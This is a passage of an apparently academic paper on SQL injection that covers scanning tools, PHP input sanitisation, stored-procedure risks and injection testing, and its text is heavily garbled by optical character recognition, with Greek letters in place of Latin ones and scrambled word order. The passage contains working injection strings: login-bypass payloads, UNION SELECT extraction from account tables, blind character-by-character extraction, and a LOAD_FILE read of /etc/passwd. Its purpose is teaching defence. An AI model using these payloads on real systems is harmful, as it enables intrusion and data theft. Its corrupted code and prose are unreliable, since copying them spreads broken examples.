issue is Google Hacki11g
Database: Tl1e Google Ι lacking Database (GHDB) is a database of qιιeΓies
l1ackeι·s
ιιsed
by
to ide11tify se11sitive ιiata 011 yοιιι· website sucl1 as poΓtal logon pages, logs
witl1 nctwoι·k secuΓity i11foπηatio11, and so 011. Some of tl1e tools laιιnch the Google
l1acki11g database cμιeι·ies onto tl1e C!'awled content of a web site and identi Γιes
sensitive data οι· exploitable taι·gets
befoΓe
a "seaΓch engine hackeΓ" does.
T11ese tools can aJso offeι· (depends οη tl1e manufactω·eι· and tl1e edition)
•
ΗΤΤΡ Editoι·
se Γνeι·
to easily constιυct HTTP/HTTPS
rcsponse.
30
ι·eqιιests
and analyze tl1e wcb
•
Ι ΙΠΡ
Sni ffeι· (like wiΓeshark (URL: www. wiι·esl1aΓk.01·g) to
and ιηodify all
ΗΠΡ/ΗΤΤΡS ιι·affic
and
Ι"evea l
all
dιιta
inteι·cept, Ι οg
sent by ιι web
applί cιιtίο η.
ΗΠΡ Fυzzeι· - PerfoΓming sophistίcated
•
ίηpιιt validaιίon.
C ι·eating
•
Detectίng
Specific
sl1own
ρ,.;.,
••·~
...
.....'
.••. .
if dangeι·oυs
can
ιηίηυtes.
ΗΠΡ
ίη
of two diffeJ"ent SQL
thc
Γιguι·e
metl1ods aι·e enabled on your web seι·ver
ίnj ect ion vυlneι·abίlίtίes dί scovered
by Weblnspect
bellow:
~Ι\λι:Ι'ο
• '"Ι 11 ~ct1·n( 0)
s
•
~ 1 1.,,._ι.Jn("~)
•
Ι ι""><Υ~...f /,άΡι«J.ι - - -
..
$tνo-~rfrι(\'f""'~~
11
peι-fonη manυally
custon1 attacks ΟΙ" ιηodify ex i stίng ones.
:.
~W'(
overflows and
ιools cl1aΓacterί stics
Αη exa ιηple
ίs
bυffeΙ"
Tests tl1at woυld have taken days to
tl1is way take only sο ιηe
•
testing for
~~
........
~
........._
• ~'r'J&",:Jt Αιtι.-:- ~ ρ.,~s. ι:οι;Ι~ Oftr~,~ lss.v:
•
ι ι; ~\<Y"J ~'\Ι Ι'i",.Υι ;ι~(f(>~ ΙΡ ΑΙ>'Ί 11$$ ι."<'ΙΙι.r'
• ~•e<tυy("' J-1rι}
• (y,..-•.-.-;
~IY•"7'J
• :..,:"'' (uι>Ι~},j
[22]
Steρ Ι: Βegίιιιιίιιg ο/ SQL ίιιjectίοιι
Once ίt has been deteι·mίned wl1etheJ" οι· not a system ίs vulnerable to SQL injectίon,
tl1c next sιep ίs to caπy out tl1e SQL injection pωcess. T11is has to be done ίη a way
wl1ίcl1
wil Ι ηοt haπη tl1e actual database e.g. by dΙΌpping tables. The tools to execιιte
aιιιomated tesιs
sl1all not only be able to find secuΓity holes bιιt as well pΓevent
daιηHging tl1e clatabases wl1ίle testίng. Such tool fοι· automating tl1e actual SQL
injectίon pι·ocess
is SPI Dy11an1ics1 SQL InjectoΓ (wl1ich co ιηes as paΓt of the
Wcblnspcct). Also tl1e Absintl1e tool can be used (URL:
l1ttp://www.Ox90.on1Λeleases/absίnthe/ ), shown in the figure bellow:
31
Absintl1e tool is ιιsed to aιιtoιηate SQL injection analysis.
Fl~
Tools Hι:lp
ht-$t !nf<>rrMtioo
ι>Β 5<hernσ
DοΛr.ιο.sό Reι;.or!ds
Etploιt Τ ΊΡ<::
SP.iect the t~·pe of injection: () Blrιd Tnie-:tion ί,~) Etroι B.ased
Select T11e Tcirget DG~abase:
v]
Corιrιc.:tion:
T~QeL URL: hιtp ://
Coι1rιectιcr1 r•1oth::>d:(.; Get
Ο COΓ(ιrns-nt
En(! Qf Query
() Post
::J useSSι
:J Aι;pend te~t to e~ of ς~ιy
Αυί.~ ,~· ιtιι:_,ι...<,
U Uso Αυt~;,\ic.:ιtίσΊ
l~Mιc:
Edt
Dcfδ'J~ V~:
[] lnJe<tol>'ι: Pdfarn~ter
[ l•dd P.ararneter ] ι
Αι!d Coo~ie
)
<
[gvcrify SQL ScrγerVcrsιc••
lniti.~lιz()
tnjectron
L.-------------------....J [22)
Botl1 tools allow testing fοι· blind and basic SQL inj ection flaws. Of coιιJ"se bot\1
types of injection testing aΓe necessaιΎ. T11ose tool s ιιse al so an autonΊated Γepoι·ting
inteι·face, pωv iding logs at tl1e end of eacl1 ηιη.
Anotl1e1· tool is SCΙ"awlΓ, developed by the ΗΡ Web Secιπity ReseaΓc\1 Gωιιp ίη
co0Γdi11ation witl1 the MSRC, is sl101·t fOI" SQL InjectoJ" and Cι·awleΓ. ScΓawlΓ will
CΙ"awl a website w\1ile siιηultaneously analyzing tl1e paΓa111eteIS of eacl1 individιιa\
web page fοι· SQL Inj ection vulneι·abilities. It can pΓovide the type of backend
datHbase ίη ιιse Hnd Η list of avHilable table nHn1es.
32
Techni cal details fol'
Scι-awlr
VeΓbo se
[26)
SQL In.jection vu lneι·abilitie s in URL paiaιη e teι-s
•
ldentify
•
Can be co nfι gu red to
•
Will idcntify tl1e type of SQL se ι-veι·
•
Will exιι·act table names (verbose only) to guaΓantee
ScΓawlΓ
ιιse
a Ρωχy to access the web s iίe
ίη ιι se
ηο
false positives
does have sorηe lin1itations:
•
Will only Cl'awls ιιp to 1500 pages
•
Does not sιφpοι·t sites
•
Does not pel'forη1 Blind SQL injection
•
Cannot ι·etΓieve database contents
•
Does not sιιppoι·t .JavaScΓipt ΟΓ flash
•
Will not test fonηs for· SQL lnjection (POST Pa Γan1eteΓs)
ι·eq uiι·iηg aιιthenticatio11
paι·s ing
lssues wi th web appl ication sca1111ing tools:
Tools a ι·e li n1ited ίn scope (co ιηpanies sell se!'ν ice as
opposed to selling tool)
• Speed veι·s us Deptl1 (in-deptl1 testing takes tίιηe)
• Diffίcιιlt to Γead outpιιt Γepor·t s (typically log files)
• False-Positives
• Tuning νe !'sus default n1ode
33
LESSONS LEARNED, WΑ YS
5
ΤΟ
PROTECT FROM
SQL INJECTIONS
5. 1
The
Geneι·al
fiι·st
step
peι·toπηed
SQL injection pι-evention
SQL injections is to deteπηine the data excl1anges
tl1e database and tl1e Web application
in:
•
rοΓ u seι·
•
towaι-ds
ίη pΙΌtecting fωm
usιιally
fοι·
steps
autl1entication
puφoses. Ιη
containing rηali cio us Sl Γings whicl1
Scaι·c/1
cngines. In
tl1ίs
paι·t. Sιιch
tl1is case the
coιιld
data excl1aηges takc place
ίηpιιt
data l1as to be cl1ecked
cause code injection to the database.
case the usually long queιγ lengl1tts pose a secuΓity
bl'eacl1 possibility, because when the le11gth is big enough, malicious code, that can
be i11jectcd to tl1e database can be pι·esent.
•
E-Com ιηe!'ce
sites. The san1e pιΌblem as
fοι·
databases applies to the e-
coιηmerce
sites as well. Big queι·ies, containing many paι·ameteι·s (ιιsually pωduct
names and
characteι-istics).
Sanitising the data pΙΌvided in the SQL and secuι·ing the applications interfacing
between ιhe end useΓ and the dalabase is tl1e way to avoid SQL injections. MeasuΓes
l1ave to be taken ίη both tl1e database and tl1e inteι·face paι·t. Ιη the FiguΓe bellow an
ίηpιιt sanitίzί:1lion
scl1ematic diagΓam is sl1own (made
toolkit -Λmnesia [31))
34
fοι·
a specific sanitization
Statlc Phase
{Static Analysis)
AMNESIA Toolset
ι
lnstrumontation
Modulo
---------
-
Wob
Applicatίon
c::)
Wob
Application
1
m8"umcmoo
Analysis
Modulc
------ - -
-------- -
Dynamic Phase
{Runtlme Monltorlng)
--
URL
~ ~
"..
lnstrυmcnjod
Wob
Aρplication
HTML /
..
1ιegιιιmaιe ~I
<
Daιa
In tl1e database part a qιιote shoιιld be ρι-eίίχed and appended to all
tl1e data
ί s nιιιneι-ίc.
T11e rights of tl1e database ιιser shall also be
of tl1e syste n1 -st0 Γed
pΓOcedιιΓes sl1oιιld
of useι·-defιned
test and evaluate u seι·
(sccu ι·e netwoι·k
5.2
Databaso
~
--
[3 1J
sο ιη e
w-i
--::::=-_J -
Modol
~
ϋ
Daιa
Users
SOL-Ouo'Y
Aunlimo
Monitoring
Module
Browser Ι
Applίcatlon
=>
Ι nριιt
pΓO cedιιΓes.
inpιιt
useι· ίηριιt,
liιnited.
Access to all
not be gt·anted if that useΓ needs access to
Tools and automated
pιΌcedure
sl1all be used to
and database integrity. Also all other security
topo\ogies, fOS
even if"
fί \teι·s, antiνinιs Scan neΓS)
ΓuJes
shall be applied.
sanitization
I npυt saniιizaιion ίη ιl1e
Conclιιsions aι·e
case of ΡΗΡ applications will be cons ideΓed
ίη
tl1is cl1apteι·.
applicable to otl1e1· appl ications also. Sanitisation is Γemoving f"l'Om
tl1e ιιseΓ ίηριιt all the possible haπηing code and Validation is tl1e cl1ecking of the
data i11put in
ιem1s
can at least αιιιse
of forιηat.
unecessaι-y
UseΓ i npιιt
data tl1at l1asn 't been validated
ΟΓ sanitised
database load, because ιηany of tl1e queΓies that Γeach
35
the database
issιιe
Ιη
woιιld
J1ave otl1erwise been ι-ejected
is the secιιι·ity one, in
te1η1s
befoι-ehand.
of SQLinjection and
the case of u seπ1aιηe/passw0Γd input, a simple ΡΗΡ
J1eadeΓ
Of couι·se tl1e other big
injection.
i ηριιt fοηη
code woιιld look
like:
<'?plφ
11 connectiorι to ιΊ-lySQL seι-νιtι·
Πl)1sc1Ι_connect('locall1os1'
. 'user11<1111c' .
'pίΙSS\νord')
:
1nysc1l_sclccι_ιlb('dnHΊl>asc') ;
// u~·eι· ίιφιιt
$ιιscrr1 nιηc
= $_rosη·ιιscr11nιηc' Ι :
$ρaSS\\'Ord
=
rηd5($_POST('paSS\VOrd'])
:
11 (.:οιιstι·ιιι·t ωιc/ rιιιι φιeιy.
$sql
·sειε<.:Τ
$rcsιιl ι
=
id
Ι'RΟΜ
uscrs WΗΕΙΗ::
ιηysql_φιcry($s<1I)
ιιscrnιιιηe="'
.
$uscr1Hιn1c
. "' AND pι1ss\νoι·d='" .
$pnsswoι·d
. "" ;
:
// l/tlιeι·e is α ιι~·eι·, log t/ιeιιι ίιι.
ί φηys<1 Ι_ιηι n1_rο1νs($rcsιιJ1)
$_S12SSJON/'login'J
>
Ο)
true :
// l~e(/ίl'(!CI to ιιdιιιίηcμ
l1ca<lcr('Locnιio11: l111p://son1csiιc.coιn/adr11incpf) :
clsc
<lic('J11correc1 ιιscrηιιιηe or ρasS\VOrιl.') :
'?>
[30/
ΊΊ1c coιJl' ίtbove
cl1ccks ιιser11nn1c Hnd
passwoι·d ίη ι11c
r
nccoι·di11gly. Ι ιhc ιιscιηruηc fί~Jd becaιηe:
qucι-y tιιιηs
database and loggs
ίι1 ιιseΓs
'" ΟΗ. pnss,.voΓd LIKE "%" -- ' tl1e11 tl1c
to:
sr:ιECT ί ιl ι:rωΜ ιι scι·s WHEl{E tlSCΙΊlίll11C="" Ω Ι~ pHSS\VOΓd ιικ~ "%" -- "AND
J111SS\VOΓιl "'"9αl 111439c7876e703c307864c9l67H15" [301
Tlie ι·es ιιlι 0Γιl1e qιιeιγ aboνe is tliaι LIKE "%" rnatclies all rows and -- coιnments eνeιγthing bel1i11d
ίι.
i.e. all ιιseι·s aι·e reιr·ieνed a11d ιl1erefo1·e can log in successΓully in the database, ι·egaι-dless of tlie
36
ιιserι1aιηe
and password. Α firsι coι1nterη1eas ι1re for this is striping ' and - - out ofthe SQL q ιιeιγ.
SQL fιιηcιίοηs likc 111 ysq l_real_escape_sιri11g() can be ιιsed . By 1/1ose means 1/1e ίηpιιt be /lo\ν:
<'!ρl1ρ
11 coιιnection ιο ι\.ly8QL .reιϊΙeι·
111ysι1Ι_co11 r1cct ( 'l oc11l hos1'
,
'ιrscιη arηc'
rηysq l_scl cι:t_d b('da ιa bHsc')
,
'ρass1νo rd ')
;
:
// u~·er iημιιι
$ιrscrr1arnc = 111ysq l_real_cscιφc_sιring($_POST['user11urηe'1 ) : // saιιitise(/ ίnpιιι
$fHΙ ss1νord = rnιl 5($_POST['pass1νord'j) ; 11 afready sa/e dιιe to ιιιc/50
11 Cοιι.1·1ι·ιιcι αιιd ηιn qιιeιy.
Ssql =
·sειεcΓ
id
ι:ι~ΟΜ
uscrs ~' l IERE uscrnarnc="' . $uscrnarnc . '" AND passwor·d="' .
$rcsιι l ι = 111ysq l_q ιιcry($sql)
$ρass1νor·d
. "" ;
;
ll etc...
'?> 130]
finaly ι·each es the database
Sl2LECT id FROM
AND
ιι sers
ίη
the fοπη :
WHERE ιιsei-name="\ " OR passwoi-d LIKE \"%\" -- "
passwo Γd = "9cd fu439c7876e703e307864c9 1 67a l 5"
T11is in pιιt is now h a 1η1 l ess
fο ι·
[30)
SQL. Passwoι·d has not been sanitized by
ιηysql_ι·eal_escape_s tι-ing() becaιιse
the vaΓi abl e $passwo Γd is hashed. The $ passwΓd
will be sani ιi zed by tl1e (MDS foι· ι11i s case) l1ashing a l goι·ithιη . As the only valιιes
ι·etιιιηed
cl1a1·actcΓ
by l1asl1ing algoΓi thms aΓe (fο Γ tl1e n1ost) Ι1eχ ones, 110 SQL inj ection pι·o n e
to
execιιte
SQL comιηands can be i nseι·ted (hex values
a lphanιιn1e ι·i c va lιι cs).
37
inc lιιde
1-0 and a-r·
Anotl1eΓ sanitization fοιη1 is typecasting. Fοι· a qιιeιΎ to allow υseΓs inseΓt an offset
fοΓ
data displaying:
<?plφ
11 coc/e...
$scιl =
'SELECT id.title FROM
$resιι l t
= rηys<1Ι_qιrcry($sql) :
11e\νs
LIMIT' .
$_GET['oΠset'J
. ', 10' ;
11 ιιιοι·e code...
?>(301
$_ GET vaι·iable, can be sanisited tl1e sa111e way tl1e pΓeνίοιιs qιιeΓy was saιιitised, but
as tl1is νaΓ iab l e is of in tegeι· νa l ιιe, we can ιιse tl1is to
i ιηpose
a ιυ le that eνeιΎ
ίηριιt
for tl1is variable will have to be integeι·, before the queιΎ is passed οη to the database.
T11is
f0Γn1
of' sanitisation is called typecasting. The intval(). Function can be
tl1is pιιφοse . Jntval takes a νa Γi ab l e, and
intege Γ nιι mber
15. Anything besides a
Γetu ι'!1s
ηιιmbe ι·
ιι sed fοι·
its in tege Γ "15" will be Γet ωηed as
will take tl1e νalιιe of Ο.
<?plφ
ll code ...
$sιιΙ = ·sαεcτ id,ιiιlc πωΜ 11e\νs LΙΜΙΤ'
$rcsιι l t
. i11ινal($_GETL'oflsc1'J) . ', 10' ; 11 :;aιιitised ίιφιιt
= 111ysql_φ1e1·y($sc1Ι) :
// ιιιοι·e code...
?>
1f the o υtput οΓ a queιΎ is to be ιιsed as an
data will l1ave to be sani tised as well. Α
called "nan1e", tl1en
οιιtpιιt
scι·i pt
i11j ect~ιl ίη
anotl1e1· queΓy tl1en tl1e outpιιt
that has as an input a $_GET variable
''Hello, [nameJ!". If both
sanitised, ιηa lίcίοιιs code cηι1 be
Ι η ΡΗΡ
ίηpιιt fο Γ
inpιιt
tl1c ηeχι quσ1
and outpιιt are not
ίη pιιt.
a function for data sanitisation l1as been developed, named
l1t111lspecialcl1a ι·s(). Τ11ίs
ι·cspec tive
funct ion ι·eplaces SQL pΓOne cJ1aracters like < witl1 thei Γ
HTML Eηιities. Ιη this case < would be tΓan sαipted as <. Usage syntax
ο Γ tl1e Γιιηctίοη
can bc seen bellow:
38
<'?p lφ
ccho 'Dear, ·, htιηlspecialct1ars($GET[' inpιιt '], ENT_QUOTES), '!';
?>
5.3
ΑΙΙ
SQL In.iecti on Detection, database
paι·t
possible SQL injection thΙ"eat s have to be tested seper·ately, include them
kinds of queries ar1d
pιΌνοke
(stι·ing te ιΊηίηatοι') ο ι· ;
possible eιτo l's.
Fiι·st
ίn
many
in the l'aw a ι·e cl1 aracteΓs like'
(e11d of a queιΎ) . Also the coιη111ent οιιt -- cl1a1·acters a ι·e to be
tcsted. Ouring tl1e testing proceduie all cxcept one test ίng paι·aιηetel's sl1all be
constant wl1ile al l va Γi at i ons of tl1e one tested sl1all be tι·i ed. POST, AND, OR c l aυses
aι·e
vaι·iable ί s
5.4
whί l e ίηριιt
to be tested too,
type sl1all be examined in any case where the
ίnput
a ηuιηbeΓ.
Standard SQL f njection Testing
Cons ίdeι·
the fo ll owing SQ L qιι e ιy
SELECT * ι::RΟΜ Useι·s WHERE ((Usc1ηan1e='$ιιseιηaιηe ') AND
(Passwoι·d=MD5('$passwoι·d'))) [ 1]
Jn cases
Jίk e
the one above the que1Ύ
wίl l
not be coiηpleted unless a valιιe
ίs ι·etιιrned
as a passwoΓd. 1f tl1e vaι·iables declaΓation ίs as follows:
$useιηaιηe
= 1' οι·' 1' = '1 '))/* (./* used as a con11ηent οιιt syιηbo l)
$passwo ι·d
= 123
cve1Ύt l1ίn g afleΓ
tl1e
ιι se ι·ηaιηe va lιιe
will be con s ideι·ed as a coιηment i.e. in a SQ L
qιιcιΎ fοπη:
SCI.ΛΞCT
* FROM Useι·s WHERE ((Useιηam e='l' or Ί ' = Ψ))/*') AND
( Passwoι·d=M D 5('$passwoι-d')))
Thc URL fοπη
wίll
be:
39
http://www.anysite.any/index.php?useιηa1ηe= Ι '%2001-%20'1 '%20=%20' J '))/* &passw
OΓd = J 23
t/1is queιγ is actualy Γeturning Γesιιlts. Ιη cases wheΓe applicable we /1ave to veΓify
also tl1e nιιιηbeΓ of tl1e outpιιt Γesults, especially if that nun1be1· is 1. TJ1is can be
peΓfoΓmed
using the opeι·ation LIMIT. The previous exaniple would look like:
$useΓname
= 1' οι·' 1' = 'Ι ')) LIMIT 1/*
$passwoι·d
= 123
Coπespond ing
URL:
l1ttp://www.a 11ys ite.any/ind cx.ρl1p?useΓna ιη e= 1'%2001-%20' 1'%20=%20' Ι
'))%20LIM I
Τ%201 /* &passwoι·d= 123
5.5
Union Query SQL Injection Testing
UNION opeΓation
fιιnctionality
l1as to be tested to fοΓ possible SQL injection attacks
vιιl11cΓabil iti es .
By tl1is opeΓation
testeΓ
out whetl1eΓ an attacker coιιld
Ι1e
shall
fίnd
is sιιpposed to
qιιeιγ
perfoι-m
Γesults
of two qιιeι-ies aι-e meι-ged.
ι·etrieve moΓe
Α
SQL injection
values than tl1e queι-ies
allow, wit/1 the injection of UNION commands.
Α siιηple
like tl1c onc bel low
SELI::CT Name, Tel, Addι·ess FROM Useι·s WHERE Id=$id
Can be
$ίd= Ι
n1odiΓιed
if the νaΓiable $id is co111bined with UNION SELECT
UNION ALL SELECTAccoιιnt,1,1 FROM Cι-editCarTabl e
wl1icl1 will
pΙΌvide
tl1e queιγ:
Sl2LE::CT Νaιηe, Tel, Addι·ess FROM UseΓs WHERE Id= I UNION ALL SELECT
Accoιιnt, 1, 1 FROM AccoιιntTable
T11e qιιeιγ above will
pωvide apaΓt f1Όη1
ιιseι·s Αccοιιnι 11ι11ηbeι-.
Na111e, Telepl1011e and Address, also tl1e
All tl1is seaι·ching ι·quiι·es knowledge of tl1e databse na1ηing
40
vonventions and
stιυctιι.-e, bιιt ιl1is
as we l1ave seen
ίη ιl1e
5.6
is so ιηetl1ing tl1at can be obtained by an attackeΓ
p.-evious cl1apleΓ
Blind SQL Injection Testing
Ι f attackeι·s pe.-foιη1ing
SQL injection attacks have no otheΓ clue to l'each a database
e.g. tl1e eιτοl' ιηessagcs do not give a11y
(In
cases jιιst a 500
ιηοst
peι-foΓm
Inteωal serveι· eηΌΙ"
at all
message)
aboιιt
theiΓ
the database stιυctuΓe
only option is to
blind attacks on the database. The n1ethod consists in caπying out a seΓies of
booloean
ιηcaning
infonηati on
qιιeries
of such
to tl1e seι·νeΓ, obseΓνing tl1e answe!'s and tinally deducing tl1e
answeι·s[ 1] Supρosly
a database contains the ρaraιηeteι· id. The
fol!owing U.RL:
!1ttp: //www.anysite.any/index.ρlψ?id= Ι'
could
(sιιpposly)
result to tl1e following queιγ:
SELECT name, addι·ess, tel FROM
UseΓs
WHERE Id='$Id'
Whic\1 acco.-ding to what l1as been analysed in the
SQL injection
vιιlneΓabilities. CeΓtajn
ιιscιηame fίeld.
ιπeνiοιιs
chaptel' can be
pΙΌne
to
SQL functions need to be used to exι ι·act tl1e
In this case tl1e pseudo-fιιnctions: SUBSTRING (text, staΓt, Jengtl1):
Retuιηs a sιιbstι·ing staΓting f1Όn1 tl1e position "staι·t" of text and o-f lengtl1 'Ίe11gtl1". If
sta.-t > Jength 11otl1ing is being ι·etιιιηed. ASCIJ (cl1ar):
LENGTI 1(text):
T11ose
tΊιnctions
ι·etιιιηs
Γetιιιηes
ASCII
valιιe
of input.
the le11gth od the inpιιt.
will be iteι·atively execιιted revealing the
ιιseιηame
cl1aracter by
cl1aΓacte.- i.e. one cl1aΓacter at a time will be selected witl1 SUBSTRfNG, tl1e
cl1aracteι· wi!I be tJ1e11 ι·eplaced wiιh tl1e coπesponding ASCII va!ue, using tl1e ASCII
functio11, and
ιl1 e ι·esιι!t
will be coιηaΓed witl1 the desiΓed va!ue. If tJ1e value ofϊd=44
tl1e sιι·ing ιl1at ca11 be executed is
$/d= I' AND ASCII(SUBSTRING(use111a111e, l, l))=44 AND '1'='1
wl1icl1 executes the fol!owing SQL:
41
SELI3CT name, addΓess, tel FROM Users WHERE Id=' Ι' AND
ASCI I (SUBSTR fNG(usernaιηe, 1, Ι ))=44 ΛΝΟ ' Ι '=' J'
1f tl1c ASCII of the cha1·acte1" contained in the field id is eqιιal to 44 then the
stateιηent
is tιυe tl1eι·efoι·e tl1e fi Γst cl1a!'acte ι· of id, has been found , if not we will
move tl11Όugl1 tl1e next ite!'alion,
Α
question tl1at aι·i ses is l1ow the test tl1at J1as canied a tιυe νalιιe, fι·οιη the one that
has canied a lalse value is diffeι·entiated. In ordel' to ιηake tlιis we peι·for111 a qιιeιΎ
fol' the field id wl1ich is always false.
$ Ιd= Ι '
AND '!' = '5
wl1icl1 leads to tl1e tollowing SQL:
SELECT ηaιη e, addι·ess, tel Ff{OM UseΓs WHERE fd=' 1' AND
' Ι' =
'5'
T11e an sweι· will be false, and thi s is su-fticient to confirn1 tl1at the value obtai ned
frοιη
the iteration is the scιme as tl1e one pl'Oduced by tl1is qιιeιΎ .
Ending of tl1e itel'ation
procedιιl'e
is a Cl'ίtical
paι·aιηeteΓ
to be defined. In case we
have !'eacl1ed two sιιbsequent Ο outpιιts of' tl1e ASCTI function, this means tl1at
notl1ing is ι·etιιιηed fl'Om tl1e fιιnctίon (the case of the chaι· Ο t1as been exlιιded if tl1e
Γunction ιυη s twίce) Ιη 0 Γde1·
chaΓactel'i st ic
test will
of tl1e SUBSTRING function and the LENGTH
.-eιuιη
ιt1en
tl1at
we hHve analyzed
ιηeaη
one
Wl1en oul'
that we l1ave ended to n1ake intel'ence, or tl1at tl1e
eΠect i vely
ch a racte ι·s
contains the valιιe ηιιll.
l f i =11 ιι111be1·
ofid
$Id= I' ΑΝΟ
LENGTH (ιιsername)=i
Wl1e ι·e ί
fιιn ction.
υse
a tιυe value and we wou ld l1ave used an ASCII code eqιιals to Ο (tl1at
is the val ιιe ηιιll),
va lιι e
to υndeι·stand wl1en we have ended, we will
found so far, The qυeιΎ becomes:
AND '1' = '1
is tl1e n ι1111 beι· of ct1aΓacteι·s analysed so faΓ SQL will look Jike tl1is:
42
SELECT nan1e, addΓess, tel FROM Useι·s WHERE Id='I' ΑΝΟ
LENGTI I (useι11arηe)= i
Wl1icl1 is
been
Ι'οΓ
tnι e Ο Γ
ΑΝΟ Ί'
= Ί'
false dependίng οη
whetheΓ
the complete lengtl1 of the id
ί nseι·ted ί η v~ιι·iable ί . Ι f not anotheΓ ί teΓation
valιιe
l1ad
is neede.
tl1is kind of SQL ίnjection attacks a laι·ge numbeι· of queι-ies is necessaι-y,
meanίng
attacks
that
woιιld
ίf the amount of Γeques ts
possible per useι· coιι ld be lίmited, suc/1
be n1ore difficult to implement. Jt also means tl1at aιιton1ated tools aι·e
ncede for detection and
protectί on
against these attacks.
-,
::l~JJ!f~Jll ' . t . 4~~~J
Url:
ΓQιιρ://ννW#. example. corη/indeχ. php?id = 2 OQUERY
Que rν:
~~~
fϊNJECTίON AND ·1·-=. '1
-= -- -·-
Ο.ιΙ el)" lde11tifie1:
rg,uE'3Y.
Fil e to durηp:
~ιc/pass'Wd
-==
Ιnj ection Ιderιtifie r: r;ϊ-ιJΕϊiΊοΝ_ ;<'·= =================!
1!
ta11
Durηp
J
Τrγ ctιar·acter:
z
rοοι 'Jt:
ΓRΙNG(LOAD_FILE('f etcf pass\1\ld'),4,1))= 110%2 0AND%20'1'%2 0=%2 0'1f:'.
,Γ RI NG (LOAD_ FILE('/ etcf pa sS\1Vd'),4,1)) = 111%2 0AN D%2 0'1'%2 0= %2 0'1 ΓRI NG (LOAD_ FILE(' f etcf passwd'),4,1))= 112%2 0AND%20'1'%2 0=%2 0'1
=
ΓRΙNG(LOAD_ FI LE('/
etc/ pas swd'),4,1))= 11 3%2 0ΑΝ D%2 0'1'%2 0 = %2 0Ί
fRING(LOAO_FILE('/ etcf paSS\ι\Ιd'),4,1)) = 114%20AND%2 0'1'%2 0=%2 0'1
fR ING (LOAD_ FILE('/ etc/ passwd'),4,1)) = 11 5%2 0ΑΝD%2 0'1'%2 0= %2 0Ί ...
ι~J_
~
--- - - -
-
111
~
(12]
43
5.7
Stot"ed Procedure In_jection
Stoι·ed pιΌcedιιι·es aτe tlioιιght
thoιιgh
to be tl1e so lutio11 to the SQL injection
this is not tωe. Dynan1ic SQL within
SQ L attacks. If the input of s toι·ed
inj ection attacks can be easily
When
ιι s ίηg
sanitize tl1e
pΙΌcedιιι·es
is also
tl1e
to
is not propeΓly sanitised tben SQL
pιΌceduΓe,
the application
n1lιst pιΌpeι·Ι y
input to eliιηinate the risk of code injection. If not sanitized, tl1e
could enteΓ n1alicioιι s SQL that will be execιιted within the stoΓed
exanψ l e
vuJneΓablc
iιηpJeιηented.
dynan1ic SQL witl1in a stoJ"ed
ιιseΓ
stoι·ed proceduι·es
probleιη,
ιιseΓ
pιΌcedιιΓe. Fοι·
pιΌcedιπe:
Cre<ιtc rποcι:ιlιιrc ιιscr_logi11
@!icld 1 νίιrcl1ar(20). @field2
Dcclarc fa$ι1Ιsιri11g νarcl1ίtr(250)
νarcl1ar(20) Λs
Scι rt1sι1Ιsιri11g = ·
Sclccι Ι
Wlιcι·e
lrom ιιscrs
liclcl 1 .. • + @lield Ι + · ω1ιl licld2 = · + @fielιl2
cxcc(@sι1Ιs1t·i11g)
Go
ln tl1is SJ>tl1e input is not san itised and tl1e Γesults will be affected accoJ"dingly,
The san1e is valid
fοΓ
the following
procedιιΓe
too:
Cr-caιc ρl'Οccιlιιι·e gct_Γeport @liel<l I νιιrcl1ar(7900) Λs
Declare ίιglίιn ν;1rc l1 ar(8000)
- ·
Sclccι · + @lίcld Ι + · Γrοιη lίcldTcιbΙc·
Seι ri~ΙΊ.111
cxcc(ft_!Jfι111)
Go
DHta Yalidation
5.8
T11eΓe aι·e fouι·
Stι-ategies
stl'ategies fοι· validating data(32), and tl1ey sl1ould be used ιη this
OJ'deΓ:
5.8. 1
Λccept known
good
'f11is stΓalcgy is also known as positive validation i.e. n1eaning l11at if tl1e input value
is nol conιained ίη the "whitelist" of known valιιes it shoιιld be rejected. ln ordeΓ fοΓ
this
nιl e ιο woι·k valιιes
sl1all always
•
Have ηο typing eιΤΟΓS
•
1lave l11ei1· lengtl1 cl1ecked
•
f Ot"ll18t and type cl1ecked jf the νalιιe ΪS 11Ut11eΓίC
44
•
fοι· syntax eποι· befoι·e
Checked
validation
fοι-
tl1e
fiΓst
tin1e.
lf a plate numbeι· is expected tl1en validation for a postcode (type, length and syntax)
sl1al l be
peι·toι·med:
ριιl1Ιίc Sι ring is(S tΓing
pl111c11) {
reιιιn1 (ρ l ίllcn != nιιl 1&& Paιιcr11 .1η<11cl1..:s("Λ(((218!9)\d{2} )/((02Ι08Ι09)\d{2} )/([ 1-91\d {3} ))$". ρlaι..:11)) ?
pla1Ct1: "":
}
Cod ing shoυld
ιηake νisible
possible inpLJΙ fron1
ι111ιrιι sted soιιι·ces
as in
1Ι1e eχanψle
bellow:
Sιring 1ai111Ι>fatcn = rcqιιcsι.geιl'ιιrdn1cιer( "platen");
Vnl idιιιio11ε11gi nc vnl icltιιor = nc1ν Val ίι1aιίο11Ε11gί11c():
boolcnn isVι1lidpl<1Ιc11 = νιιlid<1101'.isplatc11(tιιi111plaιc11);
5.8.3 Re.iect known bad
Tl1is st ι·ategy, also known as "negative" validation. Less efticient tl1an posιtιve
validation as the con1binatio11s are i11fιnite and can only ι·ely 011 a pattern basis, e.g.
suspicious c l1aτacteι·s aι-e to be ι·ejected. Of cοιιΓse like all the technίqιιes of tl1 is kind
the patteΓns (ΟΓ known bad) database shall be ιιpdated 011 a Γegu l a ι· basis.
5.8.3 Sanitize
Like any
οΙl1eΓ
ιιpdated ofιe 11
to
pattern like tecl1nique sanitisation of
ιηa inta in
it's efTectiveness.
sρecific
MoreoveΓ sιιch appιΌaches
to incoιηplete pΓOtection, as someth ing is always missing.
45
chaiacters needs to
usually lead
6
CONCLUSION
Το
avoid SQL injection attacks saniti zation and data input validation shall be
performed
ίη
botl1 the database paι·t and the web
inteι·face
application. Metl1ods such
as sιoι·ed pr·oceduΓes that used to be en oιιgl1 for database sccιιrity son1c tίιη e ago aΓe
ηο
ίn
longer eι1οιιgl1.
an application
en1bedded
Secιιι·ity
ΟΓ
and
tι·eated ίη
tl1e whole
n etwo Γk
and not speci tically
a database. Special caTe shall be applied to execιιtion of
p1Όgran1s
gι·eat dangeι·
sl1all be
ΓοΙ"
tl1at find
tl1is
tl1eiΓ
ι·easo n
Antivinιs, Fiι·ewalls, corτect
way to tl1e network
thι-ough
tl1e input fields is a
all networking secιι ι·ity coιιnteιη1easιιι·es e.g.
network topology,
ΝΑΤ
etc, l1ave to be applied. 111 any
case tl1e database pa1·t of' an application is deep inside the netwoι·k. TJ11·eats sl1all not
be al lowed to
Γeacl1
the database. T11e defense line sl1all be
the netwoΓk. Extra care shall be applied for the
